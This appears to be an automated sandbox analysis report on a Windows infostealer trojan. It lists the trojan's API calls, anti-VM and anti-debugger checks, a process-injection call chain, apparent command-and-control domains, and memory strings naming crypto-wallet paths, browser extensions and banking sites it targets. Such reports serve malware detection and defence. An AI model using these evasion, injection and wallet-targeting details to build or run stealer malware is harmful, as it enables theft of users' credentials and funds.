                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0040AF233_2_0040AF23
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0043F7303_2_0043F730
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0043C7303_2_0043C730
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00410FC83_2_00410FC8
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00426FD03_2_00426FD0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00437FE03_2_00437FE0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0040A7803_2_0040A780
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0041CFA03_2_0041CFA0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004257AC3_2_004257AC
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_006710003_2_00671000
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0067E0943_2_0067E094
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_006961023_2_00696102
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00682AA13_2_00682AA1
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_006943FF3_2_006943FF
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00688D903_2_00688D90
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00683EA03_2_00683EA0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: String function: 0067E5A0 appears 98 times
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: String function: 00407F80 appears 48 times
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: String function: 0068BE0D appears 40 times
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: String function: 00414290 appears 76 times
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: String function: 006875AB appears 42 times
                Source: uUtgy7BbF1.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: uUtgy7BbF1.exeStatic PE information: Section: .bss ZLIB complexity 1.0003249845551894
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/1@1/1
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004387D0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_004387D0
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
                Source: uUtgy7BbF1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: uUtgy7BbF1.exe, 00000003.00000003.1390477562.0000000003AF6000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390719323.0000000003AD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: uUtgy7BbF1.exeVirustotal: Detection: 69%
                Source: uUtgy7BbF1.exeReversingLabs: Detection: 68%
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile read: C:\Users\user\Desktop\uUtgy7BbF1.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\uUtgy7BbF1.exe "C:\Users\user\Desktop\uUtgy7BbF1.exe"
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeProcess created: C:\Users\user\Desktop\uUtgy7BbF1.exe "C:\Users\user\Desktop\uUtgy7BbF1.exe"
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeProcess created: C:\Users\user\Desktop\uUtgy7BbF1.exe "C:\Users\user\Desktop\uUtgy7BbF1.exe"Jump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: uUtgy7BbF1.exeStatic file information: File size 19414528 > 1048576
                Source: uUtgy7BbF1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_0067E75A push ecx; ret 0_2_0067E76D
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_004488E1 push edi; ret 3_2_004488E3
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0043F2F0 push eax; mov dword ptr [esp], F5F4FB8Ah3_2_0043F2F2
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0067E75A push ecx; ret 3_2_0067E76D
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeWindow / User API: threadDelayed 6214Jump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exe TID: 7612Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exe TID: 7872Thread sleep count: 6214 > 30Jump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_00690CF8 FindFirstFileExW,0_2_00690CF8
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_00690DA9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00690DA9
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00690CF8 FindFirstFileExW,3_2_00690CF8
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00690DA9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00690DA9
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: uUtgy7BbF1.exe, 00000003.00000003.1389246708.000000000116B000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1480812391.0000000001169000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1510107757.0000000001169000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1389102087.0000000001169000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.2171505210.0000000001173000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1562773864.0000000001169000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000002.2569817608.0000000001177000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1480945277.000000000116B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: uUtgy7BbF1.exe, 00000003.00000002.2569655131.000000000113C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX<
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421651420.0000000003B75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: uUtgy7BbF1.exe, 00000003.00000003.1421705434.0000000003B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeAPI call chain: ExitProcess graph end nodegraph_3-33432
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0043DA10 LdrInitializeThunk,3_2_0043DA10
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_006872FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006872FD
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_006A619E mov edi, dword ptr fs:[00000030h]0_2_006A619E
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_00671690 mov edi, dword ptr fs:[00000030h]0_2_00671690
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_00671690 mov edi, dword ptr fs:[00000030h]3_2_00671690
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_0068C705 GetProcessHeap,0_2_0068C705
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_0067E06C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0067E06C
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_006872FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006872FD
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_0067E420 SetUnhandledExceptionFilter,0_2_0067E420
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_0067E42C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0067E42C
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0067E06C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0067E06C
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_006872FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_006872FD
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0067E420 SetUnhandledExceptionFilter,3_2_0067E420
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 3_2_0067E42C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0067E42C

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_006A619E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_006A619E
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeMemory written: C:\Users\user\Desktop\uUtgy7BbF1.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: uUtgy7BbF1.exe, 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
                Source: uUtgy7BbF1.exe, 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
                Source: uUtgy7BbF1.exe, 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
                Source: uUtgy7BbF1.exe, 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
                Source: uUtgy7BbF1.exe, 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
                Source: uUtgy7BbF1.exe, 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
                Source: uUtgy7BbF1.exe, 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
                Source: uUtgy7BbF1.exe, 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
                Source: uUtgy7BbF1.exe, 00000000.00000002.1337561960.0000000002F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: volcanohushe.click
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeProcess created: C:\Users\user\Desktop\uUtgy7BbF1.exe "C:\Users\user\Desktop\uUtgy7BbF1.exe"Jump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00690062
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: GetLocaleInfoW,0_2_006908CD
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: GetLocaleInfoW,0_2_0068BA4C
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: EnumSystemLocalesW,0_2_006902B3
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0069034E
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: EnumSystemLocalesW,0_2_006905A1
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: GetLocaleInfoW,0_2_00690600
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: EnumSystemLocalesW,0_2_006906D5
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: GetLocaleInfoW,0_2_00690720
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: EnumSystemLocalesW,0_2_0068BFF0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_006907C7
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00690062
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: GetLocaleInfoW,3_2_006908CD
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: GetLocaleInfoW,3_2_0068BA4C
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: EnumSystemLocalesW,3_2_006902B3
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_0069034E
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: EnumSystemLocalesW,3_2_006905A1
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: GetLocaleInfoW,3_2_00690600
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: EnumSystemLocalesW,3_2_006906D5
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: GetLocaleInfoW,3_2_00690720
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: EnumSystemLocalesW,3_2_0068BFF0
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_006907C7
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeCode function: 0_2_0067EB50 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_0067EB50
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: uUtgy7BbF1.exe, 00000003.00000003.1510107757.0000000001169000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.2171505210.0000000001173000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1562773864.0000000001169000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1510304702.0000000001189000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: uUtgy7BbF1.exe PID: 7580, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: uUtgy7BbF1.exe, 00000003.00000003.1481224487.00000000011C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
                Source: uUtgy7BbF1.exe, 00000003.00000003.1481224487.00000000011C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t"
                Source: uUtgy7BbF1.exe, 00000003.00000003.1481224487.00000000011C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: enllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitApp"},{"en":"
                Source: uUtgy7BbF1.exe, 00000003.00000003.1480812391.0000000001169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: uUtgy7BbF1.exe, 00000003.00000003.1481224487.00000000011C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152c
                Source: uUtgy7BbF1.exe, 00000003.00000003.1481224487.00000000011C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"}$
                Source: uUtgy7BbF1.exe, 00000003.00000003.1481224487.00000000011C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \\Ethereum","m":["keystoq
                Source: uUtgy7BbF1.exe, 00000003.00000003.1481155531.00000000011C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: uUtgy7BbF1.exe, 00000003.00000003.1481155531.00000000011C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\uUtgy7BbF1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
